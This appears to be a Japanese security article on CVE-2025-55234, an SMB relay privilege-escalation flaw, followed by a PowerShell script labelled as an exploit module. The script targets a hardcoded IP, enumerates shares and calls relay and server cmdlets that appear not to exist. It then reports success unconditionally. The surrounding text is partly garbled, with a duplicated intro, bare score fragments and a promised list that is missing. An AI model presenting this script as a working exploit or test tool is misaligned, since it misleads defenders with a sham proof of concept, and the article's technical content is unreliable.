
この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。攻撃が成功すると、特権の昇格(EoP)につながる可能性があり、実質的に権限のないユーザーがシステム上でより高いレベルのアクセス権を取得できるようになります。
Mark Mallia 著
この脆弱性により、攻撃者はSMB(Server Message Block)プロトコルに対するリレー攻撃を実行できます。攻撃が成功すると、特権の昇格につながる可能性があり、実質的に権限のないユーザーがシステム上でより高いレベルのアクセス権を取得できるようになります。SMBは、エンタープライズ環境での広範な利用と、これまでの重大な欠陥の歴史から、長らく攻撃者の標的となってきました。例えば、CVE-2020-1301は不正なリクエストを通じてSMBv1をリモートコード実行にさらし、CVE-2022-32230はSMBv3のヌルポインタ参照によりサービス拒否を引き起こしました。悪名高いCVE-2017-0144(EternalBlue)はSMBv1を悪用してワーム型ペイロードを配信し、世界的なランサムウェアの大流行を引き起こしました。これらの以前の脆弱性と同様に、CVE-2025-55234は、セッションハイジャックやなりすまし攻撃を防ぐために、SMB署名と認証の拡張保護(EPA)を適用することの重要性を浮き彫りにしています。
ネットワーク
低
なし
必要
機密性、完全性、可用性に対する高いリスク
SMBは、エンタープライズ環境におけるファイル共有やリモートアクセスで広く使用されています。リレー攻撃は認証メカニズムを迂回し、ユーザーになりすます可能性があります。この脆弱性は、SMB署名や認証の拡張保護(EPA)が適用されていない環境で特に危険です。
Microsoftの2025年9月の更新プログラムでは、組織が以下を行うのに役立つ監査機能が導入されています。
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10" # Target server IP
$attackerCreds = Get-Credential # Credential object for relay
# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
Write-Output "Found share: $($share.Name)"
}
# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
Computer = $relayTarget
Share = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo
# Step 3: Execute relay attack
$attackPayload = {
param(
[string]$Target,
[string]$Share
)
Write-Host "Attacking $Target via share $Share"
Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
Target = $relayTarget
Share = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams
# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."
説明:
CVE-2025-55234の脆弱性は、エンタープライズ環境における厳格なSMBセキュリティ強化の必要性を浮き彫りにしています。上記の手順に従い、提供されたエクスプロイトスクリプトを適用することで、組織は潜在的なリレー攻撃に対してネットワークをテストし、保護することができます。この概念実証および関連資料は、教育および防御目的のためにのみ提供されています。これらは、セキュリティ専門家が管理された環境でCVE-2025-55234を理解、検出、および緩和することを支援することを目的としています。明示的な許可なくシステムに対してこのエクスプロイトを不正に使用することは、違法かつ非倫理的です。常に責任ある開示の慣行に従い、適用される法律および組織のポリシーを遵守してください。